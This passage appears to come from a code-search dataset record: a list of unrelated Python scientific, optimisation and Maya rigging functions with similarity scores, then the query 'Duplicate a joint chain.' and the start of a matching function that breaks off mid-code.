L_wprime\n # wprime + w3 UB: 1x + 1y - U_wprime,wk\n # wprime + w3 LB: 1x + 1y - L_wprime,wk\n dist_to_edge = min(distance_point_to_line(x, y, 0, -1, U_w3), #0x-1y+U_w3=0\n distance_point_to_line(x, y, 0, -1, L_w3), #0x-1y+L_w3=0\n # -1x + 0y + U_wprime = 0\n distance_point_to_line(x, y, -1, 0, U_wprime),\n # -1x + 0y + L_wprime = 0\n distance_point_to_line(x, y, -1, 0, L_wprime),\n # -1x - 1y + U_overlap = 0\n distance_point_to_line(x, y, -1, -1, U_overlap),\n # -1 x - y + L_overlap = 0\n distance_point_to_line(x, y, -1, -1, L_overlap))\n if dist_to_edge > current_dist_to_edge:\n #print(\"At point ({},{}), distance to edge increased from {} to {}.\"\\\n # .format(x,y,current_dist_to_edge,dist_to_edge))\n current_dist_to_edge 
= dist_to_edge\n point = (x,y)\n return(point)", "def setup_fitting_init_pars(inparam, night, band, masterbeam, order):\n\n # Determine whether IGRINS mounting was loose or\n # the night of interest is in question\n if (int(night) < 20180401) or (int(night) > 20190531):\n IPpars = inparam.ips_tightmount_pars[band][masterbeam][order]\n else:\n IPpars = inparam.ips_loosemount_pars[band][masterbeam][order]\n\n # start at bucket loc = 1250 +- 100, width = 250 +- 100,\n # depth = 100 +- 5000 but floor at 0\n centerloc = 1250 if band == 'H' else 1180\n\n # Initialize parameter array for optimization as well as half-range values\n # for each parameter during the various steps of the optimization.\n # Many of the parameters initialized here will be changed throughout the\n # code before optimization and in between optimization steps.\n\n parA0 = np.array([\n 0.0, # 0: The shift of the stellar template (km/s)\n 0.0, # 1: The scale factor for the stellar template\n 0.0, # 2: The shift of the telluric template (km/s)\n 1.0, # 3: The scale factor for the telluric template\n 0.0, # 4: vsini (km/s)\n IPpars[2], # 5: The instrumental resolution (FWHM) in pixels\n 0.0, # 6: Wavelength 0-pt\n 0.0, # 7: Wavelength linear component\n 0.0, # 8: Wavelength quadratic component\n 0.0, # 9: Wavelength cubic component\n 1.0, #10: Continuum zero point\n 0.0, #11: Continuum linear component\n 0.0, #12: Continuum quadratic component\n IPpars[1], #13: Instrumental resolution linear component\n IPpars[0], #14: Instrumental resolution quadratic component\n centerloc, #15: Blaze dip center location\n 330, #16: Blaze dip full width\n 0.05, #17: Blaze dip depth\n 90, #18: Secondary blaze dip full width\n 0.05, #19: Blaze dip depth\n 0.0, #20: Continuum cubic component\n 0.0, #21: Continuum quartic component\n 0.0, #22: Continuum quintic component\n 0.0, #23: Continuum hexic component\n 0.0, #24: secondary par\n 0.0, #25: secondary par\n 0.0, #26: secondary par\n 0.0 #27: secondary par\n ])\n\n return parA0", "def get_GNS_cut(self):\n # we build the optimization around the casted digraph instead of multidigraph\n # for simplicity\n G = self.base_digraph\n s_1 = self.sources[0]\n s_2 = self.sources[1]\n t_1 = self.destinations[0]\n t_2 = self.destinations[1]\n edges = G.edges()\n nodes = G.nodes()\n\n try:\n\n # Great an gurobi instance of the optimization model\n m = Model(\"GNS\")\n m.setParam('OutputFlag', False)\n\n x_v = {}\n # vertex variables for s_1, t_1 cut\n for v in nodes:\n x_v[v] = m.addVar(vtype=GRB.BINARY)\n\n x_e = {}\n # edge variables for s_1, t_1 cut\n for (u,v) in edges:\n x_e[u,v] = m.addVar(vtype=GRB.BINARY)\n\n y_v = {}\n # vertex variables for s_2, t_2 cut\n for v in nodes:\n y_v[v] = m.addVar(vtype=GRB.BINARY)\n\n y_e = {}\n # edge variables for s_2, t_2 cut\n for (u,v) in edges:\n y_e[u,v] = m.addVar(vtype=GRB.BINARY)\n\n z_v = {}\n # vertex variables for s_2, t_1 cut\n for v in nodes:\n z_v[v] = m.addVar(vtype=GRB.BINARY)\n\n z_e = {}\n # edge variables for s_2, t_1 cut\n for (u,v) in edges:\n z_e[u,v] = m.addVar(vtype=GRB.BINARY)\n\n e = {}\n # GNS indicator variable\n for (u,v) in edges:\n e[u,v] = m.addVar(vtype=GRB.BINARY, obj=G[u][v]['capacity'])\n\n # Done with decision variable creation\n # update model\n m.update()\n\n # Constraints\n # 1. 
Constraints for s_1 - t_1 cut\n for (u,v) in edges:\n if (u,v) == (s_1, t_1):\n m.addConstr(x_e[u,v] >= 1)\n elif u == s_1:\n m.addConstr(x_v[v] + x_e[u,v] >= 1)\n elif v == t_1:\n m.addConstr(-x_v[u] + x_e[u,v] >= 0)\n else:\n m.addConstr(x_v[v] - x_v[u] + x_e[u,v] >= 0)\n\n # 2. Constraints for s_2 - t_2 cut\n for (u,v) in edges:\n if (u,v) == (s_2, t_2):\n m.addConstr(y_e[u,v] >= 1)\n elif u == s_2:\n m.addConstr(y_v[v] + y_e[u,v] >= 1)\n elif v == t_2:\n m.addConstr(-y_v[u] + y_e[u,v] >= 0)\n else:\n m.addConstr(y_v[v] - y_v[u] + y_e[u,v] >= 0)\n\n # 3. Constraints for s_2 - t_1 cut\n for (u,v) in edges:\n if (u,v) == (s_2, t_1):\n m.addConstr(z_e[u,v] >= 1)\n elif u == s_2:\n m.addConstr(z_v[v] + z_e[u,v] >= 1)\n elif v == t_1:\n m.addConstr(-z_v[u] + z_e[u,v] >= 0)\n else:\n m.addConstr(z_v[v] - z_v[u] + z_e[u,v] >= 0)\n\n # 4. Constraints for e[u,v] >= max(x_e[u,v], y_e[u,v], z_e[u,v])\n for (u,v) in edges:\n m.addConstr(e[u,v] >= x_e[u,v])\n m.addConstr(e[u,v] >= y_e[u,v])\n m.addConstr(e[u,v] >= z_e[u,v])\n\n m.optimize()\n\n if m.status == GRB.status.OPTIMAL:\n print \"Min GNS cut value = \" + str(m.objVal)\n print \"GNS cut edges:\"\n\n for u,v in edges:\n if e[u,v].x != 0:\n print (u,v)\n print \"s1-t1 cut edges in GNS:\"\n for u,v in edges:\n if x_e[u,v].x != 0:\n print (u,v)\n\n print \"s2-t2 cut edges in GNS:\"\n for u,v in edges:\n if y_e[u,v].x != 0:\n print (u,v)\n\n print \"s2-t1 cut edges in GNS:\"\n for u,v in edges:\n if z_e[u,v].x != 0:\n print (u,v)\n else:\n # something went wrong...err...\n print \"Something was wrong\"\n\n except GurobiError:\n print ('Error report from Gurobi')", "def build_guide(self, **kwargs):\n\n # This builds your guide master and updates your options\n self.create_guide_master(**kwargs)\n\n prefix = self.prefix # Naming prefix. 
Use this for every new node you create and there should be no name clashes.\n options = self.options # Build options\n mirror_value = self.mirror_value # 1.0 for left and center sided parts and -1.0 for right sided part.\n\n mc.setAttr(self.guide_master+'.offsetTranslateY', -0.2)\n\n l_prefix = prefix.replace('C','L', 1)\n r_prefix = prefix.replace('C','R', 1)\n mirror_values = [1, -1]\n enable_steering = options.get('enableSteering')\n\n colors = ['green', 'red']\n\n for mi, prefix in enumerate([l_prefix, r_prefix]):\n\n mirror_value = mirror_values[mi]\n color = colors[mi]\n\n l_main_zero, l_main_plc = self.guide_joint('main', alt_prefix=prefix, placer_only=1)\n\n # create hub\n hub_zero, hub_plc, hub_jnt = self.guide_joint('wheelhub', alt_prefix=prefix, constraint_type='point')\n hub_end_zero, hub_end_plc, hub_end_jnt = self.guide_joint('wheelhub_end', alt_prefix=prefix, constraint_type='point')\n\n mc.xform(hub_end_zero, r=1, t=[1,0,0])\n mc.parent(hub_end_jnt, hub_jnt)\n mc.aimConstraint(hub_end_plc, hub_jnt, aim=[mirror_value,0,0], u=[0,1,0], wu=[0,1,0], wut='vector')\n mc.parentConstraint(hub_plc, hub_end_zero , mo=1)\n\n # Create steering arm\n steer_zero, steer_plc, steer_jnt = self.guide_joint('steeringArm', alt_prefix=prefix, constraint_type='parent')\n mc.xform(steer_zero, r=1, t=[-1,0,0])\n mc.parent(hub_jnt, steer_jnt)\n\n # Create shocks\n shock_a_zero, shock_a_plc, shock_a_jnt = self.guide_joint('shock_A', alt_prefix=prefix, constraint_type='point')\n shock_b_zero, shock_b_plc, shock_b_jnt = self.guide_joint('shock_B', alt_prefix=prefix, constraint_type='point')\n\n mc.xform(shock_a_zero, ws=1, t=[-2,2,0])\n mc.xform(shock_b_zero, ws=1, t=[-0.5,0.25,0])\n\n mc.parent(shock_b_jnt, shock_a_jnt)\n\n mc.aimConstraint(shock_b_plc, shock_a_jnt, aim=[mirror_value,0,0], u=[0,0,1], wu=[0,0,1], wut='vector')\n mc.aimConstraint(shock_a_plc, shock_b_jnt, aim=[-mirror_value,0,0], u=[0,0,1], wu=[0,0,1], wut='vector')\n\n # upper arm\n up_arm_zero, up_arm_plc, up_arm_jnt = self.guide_joint('upperArm', alt_prefix=prefix, constraint_type='point')\n up_arm_end_zero, up_arm_end_plc, up_arm_end_jnt = self.guide_joint('upperArm_end', alt_prefix=prefix, constraint_type='point')\n\n mc.xform(up_arm_end_zero, r=1, t=[-3.5,1,0])\n mc.xform(up_arm_zero, r=1, t=[-1,0.5,0])\n mc.parent(up_arm_end_jnt, up_arm_jnt)\n mc.aimConstraint(up_arm_end_plc, up_arm_jnt, aim=[mirror_value,0,0], u=[0,0,1], wu=[0,0,mirror_value], wut='objectRotation', wuo=up_arm_plc)\n\n # lower arm\n lo_arm_zero, lo_arm_plc, lo_arm_jnt = self.guide_joint('lowerArm', alt_prefix=prefix, constraint_type='point')\n lo_arm_end_zero, lo_arm_end_plc, lo_arm_end_jnt = self.guide_joint('lowerArm_end', alt_prefix=prefix, constraint_type='point')\n\n mc.xform(lo_arm_end_zero, r=1, t=[-4,-0.5,0])\n mc.xform(lo_arm_zero, r=1, t=[-1,-0.5,0])\n mc.parent(lo_arm_end_jnt, lo_arm_jnt)\n mc.aimConstraint(lo_arm_end_plc, lo_arm_jnt, aim=[mirror_value,0,0], u=[0,0,1], wu=[0,0,mirror_value], wut='objectRotation', wuo=lo_arm_plc)\n\n # steeringArm\n if enable_steering:\n steeringArm_a_zero, steeringArm_a_plc, steeringArm_a_jnt = self.guide_joint('steeringArm_A', alt_prefix=prefix, constraint_type='point')\n steeringArm_b_zero, steeringArm_b_plc, steeringArm_b_jnt = self.guide_joint('steeringArm_B', alt_prefix=prefix, constraint_type='point')\n\n mc.xform(steeringArm_b_zero, r=1, t=[-1.5,0,1])\n mc.xform(steeringArm_a_zero, r=1, t=[-4,0,1])\n\n mc.parent(steeringArm_b_jnt, steeringArm_a_jnt)\n mc.aimConstraint(steeringArm_b_plc, steeringArm_a_jnt, 
aim=[mirror_value,0,0], u=[0,0,1], wu=[0,0,1], wut='vector')\n\n # Create control\n zero, ctrl = self.guide_ctrl('wheel', alt_prefix=prefix, driver=hub_end_jnt, color=color, shape='circle', axis='X', scale=[3]*3, create_pivot=0)\n mc.setAttr(ctrl+'.numOffsetCtrls', 1)\n mc.addAttr(ctrl+'.numOffsetCtrls', e=1, min=1)\n mc.xform(ctrl.replace('_CTL','_A_OFF_CTL.cv[*]'), r=1, s=[0.8]*3)\n\n control.create_shape('wheel', ctrl, axis='X', scale=[3]*3)\n\n #suspension_zero, suspension_ctrl = self.guide_ctrl('suspension', create_pivot=0, driver=shock_a_jnt, axis='X', shape='pyramid', color=color, scale=[1.5,1,1], alt_prefix=prefix)\n ground_zero, ground_ctrl = self.guide_ctrl('ground', create_pivot=0, shape='square', color='grass', alt_prefix=prefix)\n mc.delete(mc.pointConstraint(hub_jnt, ground_zero))\n\n # constraint to placer\n childs = [prefix+'_wheelhub_JNT_PLC_ZERO',\n prefix+'_steeringArm_JNT_PLC_ZERO',\n prefix+'_shock_A_JNT_PLC_ZERO',\n prefix+'_shock_B_JNT_PLC_ZERO',\n prefix+'_upperArm_JNT_PLC_ZERO',\n prefix+'_upperArm_end_JNT_PLC_ZERO',\n prefix+'_lowerArm_JNT_PLC_ZERO',\n prefix+'_lowerArm_end_JNT_PLC_ZERO']\n\n for c in childs:\n mc.parentConstraint(l_main_plc, c, mo=1)\n\n mc.setAttr(l_main_plc+'.offsetTranslateY', mirror_value*0.5)\n\n # ################3\n # Place it all\n hub_pos = mc.ls(options.get('hubCenter') or '')\n if hub_pos:\n loc = utils.snap_locator(hub_pos)\n mc.delete(mc.pointConstraint(loc, self.guide_master))\n mc.setAttr(self.guide_master+'.tx', 0)\n mc.delete(mc.pointConstraint(loc, l_main_plc), loc)\n\n hub_end_pos = mc.ls(options.get('hubEndCenter') or '')\n if hub_end_pos:\n loc = utils.snap_locator(hub_end_pos)\n mc.delete(mc.pointConstraint(loc, hub_end_plc), loc)\n\n else:\n mc.xform(self.guide_master, ws=1, t=[0,2,10])\n mc.xform(l_main_plc, r=1, t=[mirror_value*6,0,0])\n\n mc.setAttr(self.guide_master+'.jointAxisVis', 1)\n\n l = utils.snap_locator(hub_jnt)\n mc.setAttr(l+'.ty', 0)\n mc.delete(mc.pointConstraint(l, ground_zero), l)\n\n chassis_plc_zero, chassis_plc = self.guide_joint('chassis_driver', placer_only=1)\n mc.setAttr(chassis_plc+'.radius', 1)\n mc.setAttr(chassis_plc+'.color', 0.96, 0.71, .01)\n mc.setAttr(chassis_plc+'.otherType', 'Leg IK Driver', type='string');\n mc.setAttr(chassis_plc+'.type', 18)\n\n mc.pointConstraint(l_prefix+'_lowerArm_end_JNT_PLC', r_prefix+'_lowerArm_end_JNT_PLC', chassis_plc_zero)\n utils.set_attrs(chassis_plc, l=1, k=0)\n\n # This finalizes your guide.\n self.finalize_guide()\n self.mirror_guide()", "def sf_bound(l0, l2, lmbdas, bidual, r, rank=False):\n\n xvals, bnd = [], []\n if l0 == \"constr\":\n offset = 2\n if rank == False:\n bnd_label = r\"$p^{\\ast \\ast}(k + r + 2)$\"\n else:\n bnd_label = r\"$p^{\\ast \\ast}(k + r + 2) - \\zeta_r$\"\n\n for l in lmbdas:\n # if l - r - offset > 0:\n # xvals.append(l)\n # bnd.append(bidual[l-r-offset])\n if l + r + offset < lmbdas[-1]:\n bnd.append(bidual[l + r + offset])\n else:\n bnd.append(bidual[-1])\n\n xvals = lmbdas\n\n elif l0 == \"pen\":\n offset = 1\n if rank == False:\n bnd_label = r\"$p^{\\ast \\ast}(\\lambda) + \\lambda(r + 1)$\"\n else:\n bnd_label = r\"$p^{\\ast \\ast}(\\lambda) + \\lambda(r + 1) + \\zeta$\"\n\n if rank == False:\n bnd = [bd + l * (r + offset) for bd, l in zip(bidual, lmbdas)]\n else:\n # this is very confusing, but the code is set up such that the 3rd\n # argument (lmbdas) is the one that varies, in this case we are\n # letting the rank vary from 1,m so we artifically let lmbdas\n # bet this and set r to be the value of l0 penalty\n\n bnd = 
[bd + r * (l + offset) for bd, l in zip(bidual, lmbdas)]\n\n xvals = lmbdas\n\n return xvals, bnd, bnd_label", "def build_stairs(self, pos1, pos2, height, extendend = False):\n raise NotImplementedError", "def final_check(points):\n for p in points:\n constraints = p.constraints\n if len(p.lies_on) == 1:\n if [x for x in p.lies_on][0].symify() is not None:\n p.x, p.y = [x for x in p.lies_on][0].arbitrary_point()\n return p\n else:\n return None\n elif len(p.lies_on) > 1:\n symified_constraints = []\n # Get all of the constraints that we have processed and given\n # locations to\n for x in p.lies_on:\n tmp = x.symify()\n if tmp is not None:\n symified_constraints.append(tmp)\n # Ensure that we have at least two constraints\n # (to define an intersection); if not go to the next point\n if len(symified_constraints) >= 2:\n # Compute the intersection\n intersection = sympy.intersection(*symified_constraints)\n if intersection:\n p.x = float(intersection[0].x)\n p.y = float(intersection[0].y)\n return p\n else:\n return None\n\n if all([type(c) == primitives.Line for c in constraints]):\n p.x = random.uniform(-1, 1)\n p.y = random.uniform(-1, 1)\n return p\n elif [type(c) for c in constraints].count(primitives.Circle) == 1:\n for c in constraints:\n if type(c) == primitives.Circle:\n circle = c\n break\n if circle.symify() is not None:\n p.x, p.y = circle.arbitrary_point()\n return p\n return None", "def test_4():\n h = iotbx.pdb.input(source_info=None, lines=test_pdb_4).construct_hierarchy()\n asc = h.atom_selection_cache()\n ncs_inp = iotbx.ncs.input(\n hierarchy=h,\n params=ncs_pars.ncs_search)\n ncs_groups = ncs_inp.get_ncs_restraints_group_list()\n assert len(ncs_groups) == 1\n # group 1\n assert ncs_groups[0].master_iselection.all_eq(\n asc.selection(string = \"chain A\").iselection())\n g1_c = ncs_groups[0].copies\n assert len(g1_c)==1\n assert g1_c[0].iselection.all_eq(\n asc.selection(string = \"chain B\").iselection())", "def __addValueConstraints(self):\n for x in range(self.width):\n for y in range(self.height):\n g = self.grid[(x, y)]\n self.solver.add(\n Or([g == Magnets.EMPTY, g == Magnets.PLUS, g == Magnets.MINUS]))\n if x > 0:\n left = self.grid[(x-1, y)]\n self.solver.add(Or([g != left, g == Magnets.EMPTY]))\n if y > 0:\n up = self.grid[(x, y-1)]\n self.solver.add(Or([g != up, g == Magnets.EMPTY]))", "def __init__(self, ftrTail, strConstraint, ftrHead):\n # the tail feature of the constraint is the \"left side\" of the constraint\n # (i.e., tail < head for the \"less than\" constraint\n self.tail = ftrTail\n # the head feature of the constraint is the \"right side\" of the constraint\n # (i.e., tail < head for the \"less than\" constraint\n self.head = ftrHead\n # store the constraint\n self.constraint = strConstraint", "def rxn_to_constraints_samples_v2(player_list, action_list, samps):\n allele_rxns_constraint_dict = {}\n for all_player in player_list:\n allele_rxns_constraint_dict[all_player] = {}\n for react in all_player.cobra_reactions.keys():\n allele_rxns_constraint_dict[all_player][react] = {}\n max_flux, min_flux = max(samps[react]), min(samps[react])\n mean_flux = np.mean(samps[react])\n \n action_to_constraints_dict = {}\n # for reactions that can't have any change, keep their bounds at a single value.\n if max_flux == min_flux: \n for a in action_list:\n action_to_constraints_dict.update({a: max_flux})\n else:\n left_bound_distance = mean_flux - min_flux\n\n gradient_steps = int(len(action_list)/2)\n # min_to_mean_grad = np.arange(min_flux, mean_flux, 
(mean_flux-min_flux)/gradient_steps)\n # max_to_mean_grad = np.arange(mean_flux, max_flux, (max_flux-mean_flux)/gradient_steps)\n min_to_mean_grad = np.arange(min_flux, mean_flux, (mean_flux-min_flux)/(gradient_steps+1))[-gradient_steps:]\n max_to_mean_grad = np.arange(mean_flux, max_flux, (max_flux-mean_flux)/(gradient_steps+1))[-gradient_steps:]\n\n for a in action_list:\n if a == \"no_change\":\n action_to_constraints_dict.update({a: 0})\n else:\n dec_or_inc = a.split(\"_\")[0]\n grad_dist = int(a.split(\"_\")[1])\n\n # It doesn't matter if mean_flux is less than or greater than 0.\n\n if dec_or_inc == \"lb\": # Change upper_bound\n action_to_constraints_dict.update({a: min_to_mean_grad[grad_dist]})\n elif dec_or_inc == \"ub\": # Change lower_bound\n action_to_constraints_dict.update({a: max_to_mean_grad[grad_dist]})\n allele_rxns_constraint_dict[all_player][react].update(action_to_constraints_dict)\n \n return allele_rxns_constraint_dict", "def calcBasis2(xpts,basis_size,R):\n out = np.zeros((len(xpts),basis_size))\n for n in range(1,basis_size+1):\n out[:,n-1] = n*spherical_jn(0,n*np.pi*xpts/R)\n # Alturnatively\n #out[:,n-1] = (R/xpts)*np.sin(n*np.pi*xpts/R)\n return out", "def make_hollow(\n self,\n p1: Vec,\n p2: Vec,\n thick: float = 16,\n mat: str = 'tools/toolsnodraw',\n inner_mat: str = '',\n ) -> List['Solid']:\n if not inner_mat:\n inner_mat = mat\n b_min, b_max = Vec.bbox(p1, p2)\n\n top = self.make_prism(\n Vec(b_min.x, b_min.y, b_max.z),\n Vec(b_max.x, b_max.y, b_max.z + thick),\n mat,\n )\n\n bottom = self.make_prism(\n Vec(b_min.x, b_min.y, b_min.z),\n Vec(b_max.x, b_max.y, b_min.z - thick),\n mat,\n )\n\n west = self.make_prism(\n Vec(b_min.x - thick, b_min.y, b_min.z),\n Vec(b_min.x, b_max.y, b_max.z),\n mat,\n )\n\n east = self.make_prism(\n Vec(b_max.x, b_min.y, b_min.z),\n Vec(b_max.x + thick, b_max.y, b_max.z),\n mat\n )\n\n north = self.make_prism(\n Vec(b_min.x, b_max.y, b_min.z),\n Vec(b_max.x, b_max.y + thick, b_max.z),\n mat,\n )\n\n south = self.make_prism(\n Vec(b_min.x, b_min.y - thick, b_min.z),\n Vec(b_max.x, b_min.y, b_max.z),\n mat,\n )\n\n top.bottom.mat = bottom.top.mat = inner_mat\n east.west.mat = west.east.mat = inner_mat\n north.south.mat = south.north.mat = inner_mat\n\n return [\n north.solid, south.solid,\n east.solid, west.solid,\n top.solid, bottom.solid,\n ]", "def synthesize_specs(self, wl, p_abs_coeff, n_abs_coeff, p_ratio, thickness):\n \n syn_abs = ((p_ratio * p_abs_coeff) + ((1-p_ratio) * n_abs_coeff)) * (thickness * 1e-7)\n \n return wl, syn_abs", "def __init__(self, model, line, line_ht, segments = None, influence = None, \r\n connectivity = 1, connectivity_normdist = None,\r\n variables = [], priors=[]):\r\n\r\n import numpy as np\r\n from scipy.interpolate import interp1d\r\n import copy\r\n \r\n # Connect this element to the solver\r\n self.model = model\r\n model.elementlist.append(self)\r\n model.linear_solver = True\r\n \r\n # Prepare the stochastic variables\r\n self.variables = variables\r\n self.priors = priors\r\n \r\n # Initialize the head target and connectivity variables\r\n self.line_ht = line_ht\r\n self.connectivity = connectivity\r\n if np.isscalar(self.connectivity): # Connectivity provided is uniform\r\n \r\n self.connectivity_uniform = True\r\n \r\n else: # Connectivity provided \r\n \r\n self.connectivity_uniform = False\r\n \r\n # Check if normalized distances were provided\r\n if connectivity_normdist is None:\r\n raise Exception('If connectivity is not uniform, a vector of equal length containing normalized 
distances (e.g., [0., 0.25, 0.6, 1.]) must be specified.')\r\n \r\n # Check if connectivity_normdist is valid\r\n if np.min(connectivity_normdist) < 0 or np.max(connectivity_normdist) > 1:\r\n raise Exception('connectivity_normdist values must be between 0 and 1. Current values: '+str(connectivity_normdist))\r\n \r\n # Check if connectivity_normdist is sorted\r\n if not (connectivity_normdist == np.sort(connectivity_normdist)).all():\r\n raise Exception('connectivity_normdist values must be provided in ascending order. Current values: '+str(connectivity_normdist))\r\n \r\n self.connectivity_normdist = connectivity_normdist\r\n \r\n # ---------------------------------------------------------------------\r\n # Subdivide the provided no flow boundary into #segments pieces\r\n \r\n # Complexify the line, if it wasn't already complex\r\n line = self.complexify(line)\r\n \r\n # The subdivision algorith requires the line coordinates as a real N-by-2 matrix\r\n line = np.column_stack((\r\n np.real(line)[:,np.newaxis],\r\n np.imag(line)[:,np.newaxis]))\r\n \r\n # Make a copy of the line\r\n self.line_raw = copy.copy(line)\r\n \r\n # Check if a subdivision has been specified\r\n if segments is None: # No subdivision required\r\n self.segments = line.shape[0]-1\r\n else: # Otherwise, set target\r\n self.segments = segments\r\n \r\n # A number of consistency checks\r\n if self.segments < self.line_raw.shape[0]-1:\r\n raise Exception('Number of segments '+str(self.segments)+\" mustn't be smaller than number of line points \"+str(line.shape[0])+'.')\r\n if len(line_ht) != line.shape[0]:\r\n raise Exception('Number of head prescriptions must equal number of vertices: '+str(len(line_ht))+' =/= '+str(line.shape[0]))\r\n \r\n \r\n if self.segments > self.line_raw.shape[0]:\r\n \r\n # Subdivide the line\r\n self.line = self.subdivide_line(np.column_stack((line,self.line_ht)),self.segments)\r\n self.line_c = copy.copy(self.line[:,0] + 1j*self.line[:,1])\r\n self.line_ht = copy.copy(self.line[:,2])\r\n \r\n else:\r\n \r\n # Otherwise, reconstruct the line format\r\n self.line = self.line_raw.copy()\r\n self.line_c = self.line[:,0] + 1j*self.line[:,1]\r\n self.line_ht = line_ht\r\n \r\n # --------------------------------------------------------------------- \r\n \r\n # Assign the initial strength variables for each segment\r\n self.strength = np.ones(self.segments)\r\n \r\n # Prepare the influence range for this line sink\r\n if influence is None:\r\n # If no influence range is specified, set it to twice the domain radius\r\n # to ensure that no point in the model domain will lie outside this range\r\n self.influence = self.model.domain_radius*2\r\n else:\r\n self.influence = influence\r\n \r\n # Prepare a few variables for this element\r\n self.L = [] # Length of each line segment\r\n self.zc = [] # Center of each line segment\r\n self.head_target = [] # Head target at each line segment\r\n \r\n for seg in range(self.segments):\r\n \r\n self.L += [np.abs(self.line_c[seg+1] - self.line_c[seg])]\r\n self.zc += [(self.line_c[seg]+self.line_c[seg+1])/2]\r\n self.head_target += [(self.line_ht[seg]+self.line_ht[seg+1])/2]\r\n \r\n # Convert list of segment centers to array\r\n self.zc = np.asarray(self.zc)\r\n self.head_target = np.asarray(self.head_target)\r\n \r\n # Now form a vector of cumulative distances\r\n self.cumdist = []\r\n for seg in range(self.segments):\r\n if seg == 0:\r\n self.cumdist.append(np.abs(self.zc[0]-self.line_c[0]))\r\n else:\r\n self.cumdist.append(np.abs(self.zc[seg]-self.zc[seg-1]))\r\n 
self.cumdist = np.cumsum(np.asarray(self.cumdist))\r\n self.cumdist /= (self.cumdist[-1] + np.abs(self.zc[-1]-self.line_c[-1]))\r\n \r\n if not self.connectivity_uniform:\r\n \r\n # Interpolate the connectivity\r\n from scipy.interpolate import interp1d\r\n itp = interp1d(self.connectivity_normdist,self.connectivity)\r\n self.connectivity_interpolated = itp(self.cumdist)\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n # Convert the head targets to potential targets\r\n self.set_potential_target()\r\n \r\n # Check if the prior matches the number of parameters\r\n if len(self.priors) != len(self.variables):\r\n raise Exception('Number of priors must match number of unknown variables. Number of priors: '+str(self.priors)+' / Number of unknown variables: '+str(len(self.variables)))\r\n \r\n # Go through all elements\r\n if len(self.variables) > 0:\r\n # There are some model variables specified\r\n for idx,var in enumerate(self.variables):\r\n self.model.num_params += 1\r\n exec(\"self.model.params += [self.%s]\" % var)\r\n self.model.priors += [self.priors[idx]]\r\n self.model.variables += [var]\r\n if 'name' in list(self.priors[idx].keys()):\r\n self.model.param_names += [self.priors[idx]['name']] \r\n else: \r\n self.model.param_names += ['unknown']", "def form_waypoints_polytraj(waypoints,n_der):\n\n for key in waypoints.keys():\n\n if waypoints[key] is not None:\n wayp_shape = np.shape(waypoints[key])\n if np.size(wayp_shape)==0:\n wayp = np.reshape(waypoints[key],(1,1))\n col = 1\n row = 1\n elif np.size(wayp_shape)==1:\n wayp = np.reshape(waypoints[key],(1,wayp_shape[0]))\n col = wayp_shape[0]\n row = 1\n else:\n row = wayp_shape[0]\n col = wayp_shape[1]\n wayp = waypoints[key]\n if row < n_der[key]:\n waypoints[key] = np.append(wayp,\n [[0.0] * col] * (n_der[key] - row), axis=0)\n return waypoints", "def structure_factor(trj, Q_range=(0.5, 50), n_points=1000, framewise_rdf=False, weighting_factor='fz'):\n if weighting_factor not in ['fz']:\n raise ValueError('Invalid weighting_factor `{}` is given.'\n ' The only weighting_factor currently supported is `fz`.'.format(\n weighting_factor))\n\n rho = np.mean(trj.n_atoms / trj.unitcell_volumes)\n L = np.min(trj.unitcell_lengths)\n\n top = trj.topology\n elements = set([a.element for a in top.atoms])\n\n compositions = dict()\n form_factors = dict()\n rdfs = dict()\n\n Q = np.logspace(np.log10(Q_range[0]),\n np.log10(Q_range[1]),\n num=n_points)\n S = np.zeros(shape=(len(Q)))\n\n for elem in elements:\n compositions[elem.symbol] = len(top.select('element {}'.format(elem.symbol)))/trj.n_atoms\n form_factors[elem.symbol] = elem.atomic_number\n\n for i, q in enumerate(Q):\n num = 0\n denom = 0\n\n for elem in elements:\n denom += compositions[elem.symbol] * form_factors[elem.symbol]\n\n for (elem1, elem2) in it.product(elements, repeat=2):\n e1 = elem1.symbol\n e2 = elem2.symbol\n\n f_a = form_factors[e1]\n f_b = form_factors[e2]\n\n x_a = compositions[e1]\n x_b = compositions[e2]\n \n try:\n g_r = rdfs['{0}{1}'.format(e1, e2)]\n except KeyError:\n pairs = top.select_pairs(selection1='element {}'.format(e1),\n selection2='element {}'.format(e2))\n if framewise_rdf:\n r, g_r = rdf_by_frame(trj,\n pairs=pairs,\n r_range=(0, L / 2),\n bin_width=0.001)\n else:\n r, g_r = md.compute_rdf(trj,\n pairs=pairs,\n r_range=(0, L / 2),\n bin_width=0.001)\n rdfs['{0}{1}'.format(e1, e2)] = g_r\n integral = simps(r ** 2 * (g_r - 1) * np.sin(q * r) / (q * r), r)\n\n if weighting_factor == 'fz':\n pre_factor = 4 * np.pi * rho\n partial_sq = (integral*pre_factor) + 
1\n num += (x_a*f_a*x_b*f_b) * (partial_sq)\n S[i] = (num/(denom**2))\n return Q, S" ]
[ "0.60946095", "0.5763195", "0.5703657", "0.5553354", "0.5487165", "0.5435914", "0.53954494", "0.51878697", "0.51259", "0.51116204", "0.5077191", "0.5054225", "0.4999024", "0.49555075", "0.49334964", "0.4926704", "0.4873679", "0.48712805", "0.48634586", "0.48509604", "0.48481923", "0.48029104", "0.47769222", "0.47725466", "0.47688386", "0.47648177", "0.47571298", "0.47539604", "0.47416186", "0.47258055", "0.47168317", "0.47127858", "0.46833634", "0.4679966", "0.4672645", "0.46492857", "0.4645094", "0.46390012", "0.46266085", "0.46191394", "0.4612809", "0.45854715", "0.45830548", "0.45613867", "0.4558685", "0.45523793", "0.4549626", "0.4532902", "0.4530924", "0.45197472", "0.45159602", "0.4507721", "0.45042852", "0.4503898", "0.4500609", "0.44953385", "0.449238", "0.44912434", "0.44895926", "0.4487377", "0.4482088", "0.44805002", "0.44780904", "0.44764683", "0.4476091", "0.44744512", "0.44735107", "0.44706124", "0.4466808", "0.44664568", "0.4461734", "0.44595557", "0.444545", "0.44414255", "0.44397676", "0.44361046", "0.44350293", "0.44328895", "0.44301182", "0.44286665", "0.44208854", "0.44163248", "0.4413904", "0.44138137", "0.44131628", "0.44121096", "0.4408477", "0.44076893", "0.4405717", "0.4403596", "0.4397157", "0.43971512", "0.439351", "0.43928206", "0.43898267", "0.43828171", "0.43804172", "0.43801415", "0.43707323", "0.4368056" ]
0.66719025
0
Duplicate a joint chain.
def duplicate_chain(chain, search='', replace='', suffix=''):

    if suffix:
        suffix = '_'+suffix

    new_jnts = []
    for joint in chain:
        new_name = joint.replace(search, replace, 1)+suffix
        new_jnt = mc.duplicate(joint, po=1, n=new_name)[0]

        if new_jnts:
